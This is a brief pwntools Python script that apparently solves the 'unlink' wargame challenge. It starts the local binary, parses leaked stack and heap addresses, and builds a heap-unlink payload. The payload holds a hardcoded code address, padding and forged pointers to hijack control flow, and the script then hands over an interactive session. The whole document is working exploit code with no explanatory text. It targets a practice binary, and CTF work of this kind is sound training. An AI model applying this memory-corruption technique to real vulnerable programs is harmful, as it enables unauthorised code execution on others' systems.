payload
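from pwn import *

# Start the target binary as a local process
p = process('/home/unlink/unlink')

# Parse the stack and heap addresses the program prints at startup
p.recvuntil(b"here is stack address leak:")
stackAddr = int(p.recvline(keepends=False), 16)
p.recvuntil(b"here is heap address leak:")
heapAddr = int(p.recvline(keepends=False), 16)

# Payload: 4-byte address 0x080484eb (little-endian), 12 bytes of padding,
# then two pointers computed from the leaked heap and stack addresses
payload = b"\xeb\x84\x04\x08"
payload += b"A" * 12
payload += p32(heapAddr + 0xc)
payload += p32(stackAddr + 0x10)
p.send(payload)

# Hand the session over to the terminal
p.interactive()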